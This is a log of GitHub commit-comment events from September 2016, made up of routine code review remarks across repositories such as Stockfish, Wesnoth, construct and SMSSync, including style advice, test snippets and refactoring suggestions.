{"id":"4612453082","type":"CommitCommentEvent","actor":{"login":"rohanjain1407"},"repo":{"name":"palipind/wedding-organizer"},"payload":{"comment":{"id":19157906,"position":1,"line":1,"path":"weddingApi/src/com/weddingapi/Wedding.java","commit_id":"6b78e8aa4444cd7ba31db8026029158f2c0bacf6","created_at":"2016-09-24T12:24:03Z","updated_at":"2016-09-24T12:24:03Z","body":"It could be useful for us to mention copyright statement on top of every .java file we create. We should do that. Something like -\r\n// Copyright (c) 2016 palipind, Inc.\r\n\r\nYou could configure your IDE to auto generate it for you -\r\nhttps://www.mkyong.com/eclipse/how-to-add-copyright-to-eclipse-automatically/"}},"created_at":"2016-09-24T12:24:03Z"}
{"id":"4612453397","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19157907,"position":null,"line":null,"path":null,"commit_id":"bb04ae6c5b332747876d345fcaa8413470450c68","created_at":"2016-09-24T12:24:19Z","updated_at":"2016-09-24T12:24:19Z","body":"After this the template is empty?!\r\nhttps://github.com/neomake/neomake/issues/new"}},"created_at":"2016-09-24T12:24:19Z"}
{"id":"4612456480","type":"CommitCommentEvent","actor":{"login":"daniel-luberda"},"repo":{"name":"reyalpsirc/FFImageLoading"},"payload":{"comment":{"id":19157910,"position":null,"line":null,"path":null,"commit_id":"142f2c0af9723dc10ee49de69f97a002061db38e","created_at":"2016-09-24T12:27:09Z","updated_at":"2016-09-24T12:27:09Z","body":"https://github.com/luberda-molinet/FFImageLoading/commit/8bbb1d86c74694001d1433b924cedd4ebd295ee1 :)"}},"created_at":"2016-09-24T12:27:09Z"}
{"id":"4612456549","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19157911,"position":null,"line":null,"path":null,"commit_id":"60363b29e9630217ed7611bcbdf060dd86ac7dac","created_at":"2016-09-24T12:27:11Z","updated_at":"2016-09-24T12:27:11Z","body":"Thanks Dan ;)"}},"created_at":"2016-09-24T12:27:11Z"}
{"id":"4612458665","type":"CommitCommentEvent","actor":{"login":"rohanjain1407"},"repo":{"name":"palipind/wedding-organizer"},"payload":{"comment":{"id":19157912,"position":9,"line":9,"path":"weddingApi/src/com/weddingapi/Wedding.java","commit_id":"6b78e8aa4444cd7ba31db8026029158f2c0bacf6","created_at":"2016-09-24T12:29:09Z","updated_at":"2016-09-24T12:29:09Z","body":"Along with copyright we should also mention @author above your class name declaration. Something like -\r\n/**\r\n* @author Neel Jain\r\n*/\r\n\r\nThis too can be auto generated -\r\nhttp://stackoverflow.com/questions/7958530/adding-author-name-in-eclipse-automatically-to-existing-files\r\n\r\n"}},"created_at":"2016-09-24T12:29:09Z"}
{"id":"4612459515","type":"CommitCommentEvent","actor":{"login":"rohanjain1407"},"repo":{"name":"palipind/wedding-organizer"},"payload":{"comment":{"id":19157916,"position":10,"line":10,"path":"weddingApi/src/com/weddingapi/Wedding.java","commit_id":"6b78e8aa4444cd7ba31db8026029158f2c0bacf6","created_at":"2016-09-24T12:29:58Z","updated_at":"2016-09-24T12:29:58Z","body":"No need for this"}},"created_at":"2016-09-24T12:29:58Z"}
{"id":"4612459605","type":"CommitCommentEvent","actor":{"login":"gaborcsardi"},"repo":{"name":"wch/r-source"},"payload":{"comment":{"id":19157917,"position":163,"line":1356,"path":"doc/manual/R-data.texi","commit_id":"6ba16f1a4ce0f489990a5cbea04f4fe871aaaeeb","created_at":"2016-09-24T12:30:02Z","updated_at":"2016-09-24T12:30:02Z","body":"@jeroenooms mongolite in the R data manual! Cool!"}},"created_at":"2016-09-24T12:30:02Z"}
{"id":"4612461198","type":"CommitCommentEvent","actor":{"login":"rohanjain1407"},"repo":{"name":"palipind/wedding-organizer"},"payload":{"comment":{"id":19157921,"position":8,"line":8,"path":"weddingApi/src/com/weddingapi/Wedding.java","commit_id":"6b78e8aa4444cd7ba31db8026029158f2c0bacf6","created_at":"2016-09-24T12:31:20Z","updated_at":"2016-09-24T12:31:20Z","body":"private. \r\n\r\nWelcome to Java :)"}},"created_at":"2016-09-24T12:31:20Z"}
{"id":"4612462614","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19157925,"position":null,"line":null,"path":null,"commit_id":"2cc671ad1c0810ec64d4be8428510def0fb57f80","created_at":"2016-09-24T12:32:44Z","updated_at":"2016-09-24T12:32:44Z","body":"This gives the following bonus in midgame for each supported pawn (White at bottom, so rows 1, 2, 8 are in fact not used):\r\n\r\n````\r\n19  20  20  20  20  20  20  19  \r\n16  19  20  20  20  20  19  16  \r\n12  16  19  20  20  19  16  12  \r\n 8  12  16  19  19  16  12   8  \r\n 4   8  12  15  15  12   8   4  \r\n 0   4   7   8   8   7   4   0  \r\n-4  -1   0   0   0   0  -1  -4  \r\n-9  -8  -8  -8  -8  -8  -8  -9  \r\n````"}},"created_at":"2016-09-24T12:32:44Z"}
{"id":"4612463375","type":"CommitCommentEvent","actor":{"login":"rohanjain1407"},"repo":{"name":"palipind/wedding-organizer"},"payload":{"comment":{"id":19157926,"position":68,"line":68,"path":"weddingApi/src/com/weddingapi/Wedding.java","commit_id":"6b78e8aa4444cd7ba31db8026029158f2c0bacf6","created_at":"2016-09-24T12:33:18Z","updated_at":"2016-09-24T12:33:18Z","body":"This file could go off as hibernate would generate it. I know you needed to create it for your testing."}},"created_at":"2016-09-24T12:33:18Z"}
{"id":"4612467661","type":"CommitCommentEvent","actor":{"login":"aramghamoyan"},"repo":{"name":"aramghamoyan/AO"},"payload":{"comment":{"id":19157933,"position":68,"line":68,"path":"Hoofdstuk 1/Opdracht 4/LandenOverzicht/LandenOverzicht/Land.cs","commit_id":"11bbd80096e0bba8a6d5452a0350fd4aedf1aaba","created_at":"2016-09-24T12:37:04Z","updated_at":"2016-09-24T12:37:04Z","body":"oke "}},"created_at":"2016-09-24T12:37:04Z"}
{"id":"4612474140","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19157946,"position":null,"line":null,"path":null,"commit_id":"b98f8aab7c48cec1469aac443d37ab1e0503f292","created_at":"2016-09-24T12:42:35Z","updated_at":"2016-09-24T12:42:35Z","body":"Huh? Weren't these updates already applied by me and'or @jyrkive?"}},"created_at":"2016-09-24T12:42:35Z"}
{"id":"4612475868","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19157949,"position":null,"line":null,"path":null,"commit_id":"16c1b86443214340faf6f45702bac164b8cdaa34","created_at":"2016-09-24T12:44:05Z","updated_at":"2016-09-24T12:44:05Z","body":"Nice! Makes me wonder if it would be possible to get the game to actually read the metadata itself to fill in a missing title="}},"created_at":"2016-09-24T12:44:05Z"}
{"id":"4612476714","type":"CommitCommentEvent","actor":{"login":"123kaikai123"},"repo":{"name":"123kaikai123/first-project"},"payload":{"comment":{"id":19157951,"position":2,"line":2,"path":"README.md","commit_id":"44c5d7bdba9a5aede5a692b1883ecece393434af","created_at":"2016-09-24T12:44:47Z","updated_at":"2016-09-24T12:44:47Z","body":"Kherfell esconde"}},"created_at":"2016-09-24T12:44:47Z"}
{"id":"4612476995","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19157952,"position":null,"line":null,"path":null,"commit_id":"b6c7273fb5d1e513a9ad707ced4a0ce12d655b4a","created_at":"2016-09-24T12:45:00Z","updated_at":"2016-09-24T12:45:00Z","body":"Whoops, that must've been my fault while cherry-picking..."}},"created_at":"2016-09-24T12:45:00Z"}
{"id":"4612477700","type":"CommitCommentEvent","actor":{"login":"javadev"},"repo":{"name":"anka976/mugloar"},"payload":{"comment":{"id":19157953,"position":242,"line":234,"path":"src/main/java/mugloar/Application.java","commit_id":"6dbfad3a222459707247684c167ced690f41b258","created_at":"2016-09-24T12:45:29Z","updated_at":"2016-09-24T12:45:29Z","body":"Real magic happened here :)"}},"created_at":"2016-09-24T12:45:29Z"}
{"id":"4612480984","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19157959,"position":null,"line":null,"path":null,"commit_id":"5a3e4f14831e42d151067c7ba492e754fc23ae3f","created_at":"2016-09-24T12:48:02Z","updated_at":"2016-09-24T12:48:02Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fiLaSv-xTqm-xyBgY_gIgw"}},"created_at":"2016-09-24T12:48:02Z"}
{"id":"4612481246","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19157960,"position":null,"line":null,"path":null,"commit_id":"5a3e4f14831e42d151067c7ba492e754fc23ae3f","created_at":"2016-09-24T12:48:09Z","updated_at":"2016-09-24T12:48:09Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XdoWA-sHSXy98Ip13JynJQ"}},"created_at":"2016-09-24T12:48:09Z"}
{"id":"4612481453","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19157962,"position":null,"line":null,"path":null,"commit_id":"5a3e4f14831e42d151067c7ba492e754fc23ae3f","created_at":"2016-09-24T12:48:18Z","updated_at":"2016-09-24T12:48:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PTU7_qOdTEGrpUXNRw-Hpg"}},"created_at":"2016-09-24T12:48:18Z"}
{"id":"4612481850","type":"CommitCommentEvent","actor":{"login":"solnic"},"repo":{"name":"rom-rb/rom-sql"},"payload":{"comment":{"id":19157964,"position":null,"line":null,"path":null,"commit_id":"5ea5946f3a59f363bc51c125cebf48e09ce970f4","created_at":"2016-09-24T12:48:33Z","updated_at":"2016-09-24T12:48:33Z","body":"Please move this commit to master already :)"}},"created_at":"2016-09-24T12:48:33Z"}
{"id":"4612482160","type":"CommitCommentEvent","actor":{"login":"marcoscrcamargo"},"repo":{"name":"SO-I-2016/MinOS"},"payload":{"comment":{"id":19157965,"position":null,"line":null,"path":null,"commit_id":"813ecb74f61ce5fd240887f7e1e0886d56dd153e","created_at":"2016-09-24T12:48:48Z","updated_at":"2016-09-24T12:48:48Z","body":"Porque part of boot e não do MinOS?"}},"created_at":"2016-09-24T12:48:48Z"}
{"id":"4612483150","type":"CommitCommentEvent","actor":{"login":"madconst"},"repo":{"name":"aospan/NetUP_Dual_Universal_CI-fpga"},"payload":{"comment":{"id":19157967,"position":null,"line":null,"path":null,"commit_id":"4514e89fee680835e9f8705518326b701c7f0d6d","created_at":"2016-09-24T12:49:32Z","updated_at":"2016-09-24T12:49:32Z","body":"I would rename `bypass_test` to `bypass`."}},"created_at":"2016-09-24T12:49:32Z"}
{"id":"4612485561","type":"CommitCommentEvent","actor":{"login":"Nozlaf"},"repo":{"name":"Nozlaf/WeBid"},"payload":{"comment":{"id":19157971,"position":null,"line":null,"path":null,"commit_id":"d6eafcfe85acdf91bab53020117c98752c32c0d6","created_at":"2016-09-24T12:51:18Z","updated_at":"2016-09-24T12:51:18Z","body":"reverted this because I accidentally put it in this branch instead of another one\r\n"}},"created_at":"2016-09-24T12:51:18Z"}
{"id":"4612486437","type":"CommitCommentEvent","actor":{"login":"Wedge009"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19157974,"position":null,"line":null,"path":null,"commit_id":"b98f8aab7c48cec1469aac443d37ab1e0503f292","created_at":"2016-09-24T12:52:02Z","updated_at":"2016-09-24T12:52:02Z","body":"Mostly. But this one was to remove the alpha.cpp/hpp + keep the filters files sorted as VS just throws them in whichever order. If you don't think it's a good idea to keep them somewhat sorted, I can just leave it."}},"created_at":"2016-09-24T12:52:02Z"}
{"id":"4612488254","type":"CommitCommentEvent","actor":{"login":"Sammygracezhu"},"repo":{"name":"ushahidi/SMSSync"},"payload":{"comment":{"id":19157980,"position":null,"line":null,"path":null,"commit_id":"54951c1794e24f74e12b3df704fe35b6ddb65efd","created_at":"2016-09-24T12:53:35Z","updated_at":"2016-09-24T12:53:35Z","body":"Is the line 62 unreachable? Because there is a \"return\" statement before it."}},"created_at":"2016-09-24T12:53:35Z"}
{"id":"4612491611","type":"CommitCommentEvent","actor":{"login":"IceFlorenceIce"},"repo":{"name":"IceFlorenceIce/IceFlorenceIce.github.io"},"payload":{"comment":{"id":19157984,"position":4,"line":9,"path":"index.html","commit_id":"d752f608042a2e9165337615a1aec84a93e1a725","created_at":"2016-09-24T12:56:22Z","updated_at":"2016-09-24T12:56:22Z","body":"just a practice"}},"created_at":"2016-09-24T12:56:22Z"}
{"id":"4612492289","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19157987,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-24T12:56:54Z","updated_at":"2016-09-24T12:56:54Z","body":"全封了"}},"created_at":"2016-09-24T12:56:54Z"}
{"id":"4612493799","type":"CommitCommentEvent","actor":{"login":"JimBobSquarePants"},"repo":{"name":"leekelleher/umbraco-ditto"},"payload":{"comment":{"id":19157990,"position":21,"line":52,"path":"src/Our.Umbraco.Ditto/ComponentModel/Processors/DittoFactoryAttribute.cs","commit_id":"3781d9fbb919bcec23c1614012a4101428d949b8","created_at":"2016-09-24T12:58:11Z","updated_at":"2016-09-24T12:58:11Z","body":"I guess we could cache them ourselves and check that cache first before pluginmanager."}},"created_at":"2016-09-24T12:58:11Z"}
{"id":"4612494045","type":"CommitCommentEvent","actor":{"login":"pszeptynski"},"repo":{"name":"pszeptynski/clstore"},"payload":{"comment":{"id":19157991,"position":null,"line":null,"path":null,"commit_id":"5c47e57bf7036b3cf2e008a574ec3a82c926336b","created_at":"2016-09-24T12:58:22Z","updated_at":"2016-09-24T12:58:22Z","body":"Updated README.md directly at GitHub site so needed to pull and merge it.\r\n"}},"created_at":"2016-09-24T12:58:22Z"}
{"id":"4612494844","type":"CommitCommentEvent","actor":{"login":"OhBonsai"},"repo":{"name":"construct/construct"},"payload":{"comment":{"id":19157992,"position":null,"line":null,"path":null,"commit_id":"9aed3c2bd073f8736459a0c2aecadb147b13c482","created_at":"2016-09-24T12:59:01Z","updated_at":"2016-09-24T12:59:01Z","body":"```\r\n@pytest.mark.xfail(reason=\"issue #171, expected result is not clear\")\r\ndef test_from_issue_171(self):\r\n    attributes = BitStruct(\r\n        \"attr\" / Aligned(Array(3, Struct(\r\n            \"attrCode\" / BitsInteger(16),\r\n            \"attrValue\" / Switch(this.attrCode, {\r\n                34: BitsInteger(8),\r\n                205: BitsInteger(2),\r\n                512: BitsInteger(2)\r\n            }),\r\n        )), modulus=8),\r\n    )\r\n    blob = b\"\\x00\\x22\\x82\\x00\\xCD\\x80\\x80\\x10\"\r\n    assert attributes.parse(blob) == Container(attr=[\r\n        Container(attrCode=34, attrValue=130),\r\n        Container(attrCode=205, attrValue=2),\r\n        Container(attrCode=512, attrValue=1)])\r\n\r\n```"}},"created_at":"2016-09-24T12:59:01Z"}
{"id":"4612495842","type":"CommitCommentEvent","actor":{"login":"Sammygracezhu"},"repo":{"name":"ushahidi/SMSSync"},"payload":{"comment":{"id":19157995,"position":null,"line":null,"path":null,"commit_id":"54951c1794e24f74e12b3df704fe35b6ddb65efd","created_at":"2016-09-24T12:59:52Z","updated_at":"2016-09-24T12:59:52Z","body":"  } catch (InterruptedException e) {\r\n -                        return;                                                 _//# **The following statement may be unreachable.**_\r\n +            App.getAppComponent().fileManager()\r\n +                    .append(context.getString(R.string.active_data_connection));"}},"created_at":"2016-09-24T12:59:52Z"}
{"id":"4612496564","type":"CommitCommentEvent","actor":{"login":"jaumeortola"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19157998,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-24T13:00:20Z","updated_at":"2016-09-24T13:00:20Z","body":"Just changing the enconding in en_GB.info fixes the problem with the diacritics. So there is no need to commit again the dictionary. \r\nI will add some tests so these issues don't appear in the future."}},"created_at":"2016-09-24T13:00:20Z"}
{"id":"4612499936","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19158004,"position":null,"line":null,"path":null,"commit_id":"d394cf210e392fd5e433cb9a89495641f3acaccc","created_at":"2016-09-24T13:02:49Z","updated_at":"2016-09-24T13:02:49Z","body":"@snicolet What do you think about [this ](https://github.com/pb00068/Stockfish/tree/discov_checks_in_see6) idea? Almost all is now done with bitboards and we additionally check it the discovered checker is still on it's place."}},"created_at":"2016-09-24T13:02:49Z"}
{"id":"4612501799","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"davidssmith/RawArray.jl"},"payload":{"comment":{"id":19158007,"position":10,"line":7,"path":".travis.yml","commit_id":"48b25c025a3905cf81395e584943d1ec90d502bc","created_at":"2016-09-24T13:04:22Z","updated_at":"2016-09-24T13:04:22Z","body":"release is about to change to 0.5, so better use `0.4` and `0.5` separately to continue testing against your supported versions"}},"created_at":"2016-09-24T13:04:22Z"}
{"id":"4612501938","type":"CommitCommentEvent","actor":{"login":"Sammygracezhu"},"repo":{"name":"ushahidi/SMSSync"},"payload":{"comment":{"id":19158008,"position":null,"line":null,"path":null,"commit_id":"54951c1794e24f74e12b3df704fe35b6ddb65efd","created_at":"2016-09-24T13:04:28Z","updated_at":"2016-09-24T13:04:28Z","body":"mAlertPresenter.lostConnectionThread = new Thread(new Runnable() {\r\n +                    @Override\r\n +                    public void run() {\r\n +                        try {\r\n +                            Thread.sleep(AlertPresenter.MAX_DISCONNECT_TIME);\r\n +                        } catch (InterruptedException e) {\r\n +                            return;\r\n +                        }\r\n +                        mAlertPresenter.dataConnectionLost();\r\n                      }\r\n -                    mAlertPresenter.dataConnectionLost();\r\n -                }\r\n -            });\r\nReplace this with: \r\n      mAlertPresenter.lostConnectionThread = new Thread(()->{                  \r\n +                        try {\r\n +                            Thread.sleep(AlertPresenter.MAX_DISCONNECT_TIME);\r\n +                        } catch (InterruptedException e) {\r\n +                            return;\r\n +                        }\r\n +                        mAlertPresenter.dataConnectionLost();\r\n                      }\r\n -                    mAlertPresenter.dataConnectionLost();\r\n -                });\r\n?? Since Lambda expression is popular now."}},"created_at":"2016-09-24T13:04:28Z"}
{"id":"4612503406","type":"CommitCommentEvent","actor":{"login":"arekbulski"},"repo":{"name":"construct/construct"},"payload":{"comment":{"id":19158012,"position":null,"line":null,"path":null,"commit_id":"9aed3c2bd073f8736459a0c2aecadb147b13c482","created_at":"2016-09-24T13:05:41Z","updated_at":"2016-09-24T13:05:41Z","body":"What about it?"}},"created_at":"2016-09-24T13:05:41Z"}
{"id":"4612503748","type":"CommitCommentEvent","actor":{"login":"Sammygracezhu"},"repo":{"name":"ushahidi/SMSSync"},"payload":{"comment":{"id":19158014,"position":null,"line":null,"path":null,"commit_id":"54951c1794e24f74e12b3df704fe35b6ddb65efd","created_at":"2016-09-24T13:05:55Z","updated_at":"2016-09-24T13:05:55Z","body":"mAlertPresenter.lostConnectionThread = new Thread(new Runnable() {\r\n\r\n@Override\r\npublic void run() {\r\ntry {\r\nThread.sleep(AlertPresenter.MAX_DISCONNECT_TIME);\r\n} catch (InterruptedException e) {\r\nreturn;\r\n}\r\nmAlertPresenter.dataConnectionLost(); }\r\nmAlertPresenter.dataConnectionLost();\r\n}\r\n}); Replace this with: mAlertPresenter.lostConnectionThread = new Thread(()->{\r\ntry {\r\nThread.sleep(AlertPresenter.MAX_DISCONNECT_TIME);\r\n} catch (InterruptedException e) {\r\nreturn;\r\n}\r\nmAlertPresenter.dataConnectionLost(); }\r\nmAlertPresenter.dataConnectionLost();\r\n});\r\n\r\n ?? Since Lambda expression is popular now.\r\nAnd all Runnable interface can use lambda expression . "}},"created_at":"2016-09-24T13:05:55Z"}
{"id":"4612504825","type":"CommitCommentEvent","actor":{"login":"Sammygracezhu"},"repo":{"name":"ushahidi/SMSSync"},"payload":{"comment":{"id":19158018,"position":null,"line":null,"path":null,"commit_id":"54951c1794e24f74e12b3df704fe35b6ddb65efd","created_at":"2016-09-24T13:06:48Z","updated_at":"2016-09-24T13:06:48Z","body":"mAlertPresenter.lostConnectionThread = new Thread(new Runnable() {\r\n\r\n@Override\r\npublic void run() {\r\ntry {\r\nThread.sleep(AlertPresenter.MAX_DISCONNECT_TIME);\r\n} catch (InterruptedException e) {\r\nreturn;\r\n}\r\nmAlertPresenter.dataConnectionLost(); }\r\nmAlertPresenter.dataConnectionLost();\r\n}\r\n});\r\n----------------------------------------------------------------------------------------------\r\n Replace this with: mAlertPresenter.lostConnectionThread = new Thread(()->{\r\ntry {\r\nThread.sleep(AlertPresenter.MAX_DISCONNECT_TIME);\r\n} catch (InterruptedException e) {\r\nreturn;\r\n}\r\nmAlertPresenter.dataConnectionLost(); }\r\nmAlertPresenter.dataConnectionLost();\r\n});\r\n\r\n?? Since Lambda expression is popular now.\r\nAnd all Runnable interface can use lambda expression ."}},"created_at":"2016-09-24T13:06:48Z"}
{"id":"4612507706","type":"CommitCommentEvent","actor":{"login":"CodeWolfSeven"},"repo":{"name":"CodeWolfSeven/playground-custom-plugins"},"payload":{"comment":{"id":19158024,"position":null,"line":null,"path":null,"commit_id":"aa6ad44045a1381849e906d3ccf193962dfcfd12","created_at":"2016-09-24T13:09:19Z","updated_at":"2016-09-24T13:09:19Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [maintenance.php - Troubleshooting on live site - throws 500 error](https://trello.com/c/V5G3gDor/124-maintenance-php-troubleshooting-on-live-site-throws-500-error)"}},"created_at":"2016-09-24T13:09:19Z"}
{"id":"4612508565","type":"CommitCommentEvent","actor":{"login":"arekbulski"},"repo":{"name":"construct/construct"},"payload":{"comment":{"id":19158027,"position":null,"line":null,"path":null,"commit_id":"9aed3c2bd073f8736459a0c2aecadb147b13c482","created_at":"2016-09-24T13:10:01Z","updated_at":"2016-09-24T13:10:01Z","body":"Ah the blob is different. Just says so."}},"created_at":"2016-09-24T13:10:01Z"}
{"id":"4612511525","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19158034,"position":null,"line":null,"path":null,"commit_id":"df7f50992c70182abf80a77433eeaea2ce3e1cd6","created_at":"2016-09-24T13:12:32Z","updated_at":"2016-09-24T13:12:32Z","body":"Can you show me an example where the change applies ?"}},"created_at":"2016-09-24T13:12:32Z"}
{"id":"4612513461","type":"CommitCommentEvent","actor":{"login":"snyaggarwal"},"repo":{"name":"OpenConceptLab/ocl_web"},"payload":{"comment":{"id":19158037,"position":52,"line":96,"path":"ocl_web/templates/users/user_detail.html","commit_id":"9a68b8742c0a307033285c606114224f6307f4d5","created_at":"2016-09-24T13:14:08Z","updated_at":"2016-09-24T13:14:08Z","body":"Create New Organization --> New Organization -- broke the [e2e build](https://snap-ci.com/OpenConceptLab/ocl_web/branch/master/logs/defaultPipeline/252/e2e?back_to=build_history) :)\r\n\r\nI have corrected it now. Make sure to run the e2e tests when you update HTML/JS/CSS by:\r\n`./node_modules/protractor/bin/protractor ./ocl_web/tests/ui_tests/conf.js`"}},"created_at":"2016-09-24T13:14:08Z"}
{"id":"4612516355","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19158043,"position":null,"line":null,"path":null,"commit_id":"b98f8aab7c48cec1469aac443d37ab1e0503f292","created_at":"2016-09-24T13:16:33Z","updated_at":"2016-09-24T13:16:33Z","body":"Ah. Keeping the sorted isn't a bad idea, sure. (Actually I seem to recall that MSVC forcibly sorts them, but maybe that's only in the UI.)"}},"created_at":"2016-09-24T13:16:33Z"}
{"id":"4612517410","type":"CommitCommentEvent","actor":{"login":"ascherer"},"repo":{"name":"ascherer/debbuild"},"payload":{"comment":{"id":19158045,"position":70,"line":163,"path":"debbuild","commit_id":"c175a65f2ee15f2a8526888c723d6cb2d9d8f553","created_at":"2016-09-24T13:17:27Z","updated_at":"2016-09-24T13:17:27Z","body":"This couldn't possibly work! `%specglobals` will be set _after_ this versioning stuff."}},"created_at":"2016-09-24T13:17:27Z"}
{"id":"4612522614","type":"CommitCommentEvent","actor":{"login":"nosijf982"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19158059,"position":null,"line":null,"path":null,"commit_id":"e8f38493b903a5c67a9d327e2ec975869490bda4","created_at":"2016-09-24T13:21:42Z","updated_at":"2016-09-24T13:21:42Z","body":"My fault,sorry"}},"created_at":"2016-09-24T13:21:42Z"}
{"id":"4612523747","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158061,"position":null,"line":null,"path":null,"commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:22:32Z","updated_at":"2016-09-24T13:22:32Z","body":"@cafferoman_bot"}},"created_at":"2016-09-24T13:22:32Z"}
{"id":"4612524768","type":"CommitCommentEvent","actor":{"login":"AYARIMA"},"repo":{"name":"AYARIMA/harvard.mba"},"payload":{"comment":{"id":19158063,"position":null,"line":null,"path":null,"commit_id":"506463101b30979ba564530e5c198399683140df","created_at":"2016-09-24T13:23:21Z","updated_at":"2016-09-24T13:23:21Z","body":"so be prepared to struggle...."}},"created_at":"2016-09-24T13:23:21Z"}
{"id":"4612524980","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158068,"position":null,"line":null,"path":null,"commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:23:31Z","updated_at":"2016-09-24T13:23:31Z","body":"@cafferoman_bot"}},"created_at":"2016-09-24T13:23:31Z"}
{"id":"4612525234","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158071,"position":null,"line":null,"path":null,"commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:23:45Z","updated_at":"2016-09-24T13:23:45Z","body":"سلام"}},"created_at":"2016-09-24T13:23:45Z"}
{"id":"4612526459","type":"CommitCommentEvent","actor":{"login":"lizhaohan001"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19158080,"position":null,"line":null,"path":null,"commit_id":"05ca22f0fc43d1c95db2baf5c0ba56d9b67b2c86","created_at":"2016-09-24T13:24:46Z","updated_at":"2016-09-24T13:24:46Z","body":"讲道理。难道这个Timer和Java的Timer一样？？？\r\n**如果是，那就危险了。**"}},"created_at":"2016-09-24T13:24:46Z"}
{"id":"4612526546","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158081,"position":null,"line":null,"path":null,"commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:24:50Z","updated_at":"2016-09-24T13:24:50Z","body":"!id"}},"created_at":"2016-09-24T13:24:50Z"}
{"id":"4612527571","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19158084,"position":25,"line":173,"path":"src/Environments/SysV/SysVPlatform.cs","commit_id":"6cbcb348eaa635d3b7b603ac17b1d460df6e04ea","created_at":"2016-09-24T13:25:42Z","updated_at":"2016-09-24T13:25:42Z","body":"Shouldn't be else clause `this.trashedRegs = new RegisterStorage[0];`"}},"created_at":"2016-09-24T13:25:42Z"}
{"id":"4612528568","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158085,"position":null,"line":null,"path":null,"commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:26:31Z","updated_at":"2016-09-24T13:26:31Z","body":"آدرس لینک و آیدی و عکس و فیلم حذف شود"}},"created_at":"2016-09-24T13:26:31Z"}
{"id":"4612529041","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158089,"position":null,"line":null,"path":null,"commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:26:55Z","updated_at":"2016-09-24T13:26:55Z","body":"- [ ] "}},"created_at":"2016-09-24T13:26:55Z"}
{"id":"4612529523","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158090,"position":null,"line":null,"path":null,"commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:27:10Z","updated_at":"2016-09-24T13:27:10Z","body":"@cafferoman_bot"}},"created_at":"2016-09-24T13:27:10Z"}
{"id":"4612534732","type":"CommitCommentEvent","actor":{"login":"mgudemann"},"repo":{"name":"diffblue/cbmc"},"payload":{"comment":{"id":19158109,"position":30,"line":992,"path":"src/test_gen/java_test_source_factory.cpp","commit_id":"cd0338b07e1d30939533afdd0f0ea53012033fb9","created_at":"2016-09-24T13:31:11Z","updated_at":"2016-09-24T13:31:11Z","body":"fixed in cristina-david/cbmc@92d0340ab49126909572880c70df577927127f7d"}},"created_at":"2016-09-24T13:31:11Z"}
